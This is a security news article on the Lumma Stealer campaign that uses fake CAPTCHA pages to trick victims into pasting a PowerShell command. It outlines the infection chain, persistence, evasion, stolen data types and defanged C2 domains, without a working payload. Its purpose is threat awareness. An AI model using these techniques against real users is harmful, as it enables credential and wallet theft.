Lumma Stealer Exploits Fake CAPTCHA Pages to Harvest Sensitive Data

A sophisticated malware campaign is utilizing fake CAPTCHA verification pages to distribute Lumma Stealer, an advanced information-stealing malware that has gained significant traction in underground markets since its 2022 debut. 

As of March 2025, this malware-as-a-service (MaaS) operation maintains over a thousand active subscribers, with subscription prices starting at $250.

The Fake CAPTCHA Attack

Kaspersky reports that the attack vector leverages users’ familiarity with common verification systems like Google reCAPTCHA and Cloudflare CAPTCHA. 

Victims typically encounter these fake verification pages through two primary channels: cloned pirated media websites with injected malicious advertisements, and fraudulent Telegram channels masquerading as cryptocurrency or pirated content communities.

When users visit these deceptive pages, they’re presented with what appears to be a standard CAPTCHA verification interface containing an “I’m not a robot” or “Verify” button. 

The sinister mechanism activates when users click this button, which covertly copies a malicious PowerShell command to their clipboard.

The deception is particularly effective because it instructs victims to perform an apparently innocuous sequence: open the Run dialog with Win+R, press Ctrl+V, then hit Enter. 

Victims unintentionally execute a command similar to:

This command downloads a Base64-encoded PowerShell script that initiates the Lumma Stealer infection chain.

Technical Infection Process

The infection process employs multiple sophisticated techniques to evade detection. Upon execution, the malware downloads a ZIP file, typically to %AppData%\Roaming\, extracts its contents to a hidden folder, and establishes persistence by creating a registry entry under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.

In more complex scenarios, the malware deploys a multi-layered approach utilizing JavaScript code hidden in seemingly innocent media files. 

The infection chain includes obfuscated code executed through Microsoft’s HTML Application engine (mshta.exe), which ultimately downloads and executes the Lumma payload.

Lumma employs two primary infection methods to bypass security solutions:

• DLL sideloading – exploiting trusted applications to load malicious dynamic link libraries.
• Injection of malicious code into overlay sections of legitimate software.

The malware also performs anti-analysis checks, scanning for security products like Avast, AVG, McAfee, and Bitdefender before deploying its payload.

Data Exfiltration Capabilities

Once installed, Lumma Stealer targets an extensive range of sensitive information:

• Cryptocurrency wallet credentials and browser extensions (including MetaMask).
• Two-factor authentication (2FA) data.
• Browser-stored credentials and cookies.
• Remote access tool credentials (e.g., AnyDesk).
• Password manager data (including KeePass).
• Financial information such as credit card numbers.

The stolen data is transmitted to command and control (C2) servers through encrypted HTTP POST requests to domains like reinforcenh[.]shop and stogeneratmns[.]shop.

Security experts recommend heightened vigilance when encountering CAPTCHA verification pages, particularly on sites offering pirated content or cryptocurrency services. 

Users should never execute commands from their clipboard without understanding their function, especially when prompted by unexpected verification processes.

Organizations should implement robust endpoint protection solutions and user awareness training to mitigate the risk posed by this increasingly prevalent threat, as even corporate environments have fallen victim to Lumma Stealer infections that may serve as entry points for more devastating attacks like ransomware.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy

The post Lumma Stealer Exploits Fake CAPTCHA Pages to Harvest Sensitive Data appeared first on Cyber Security News.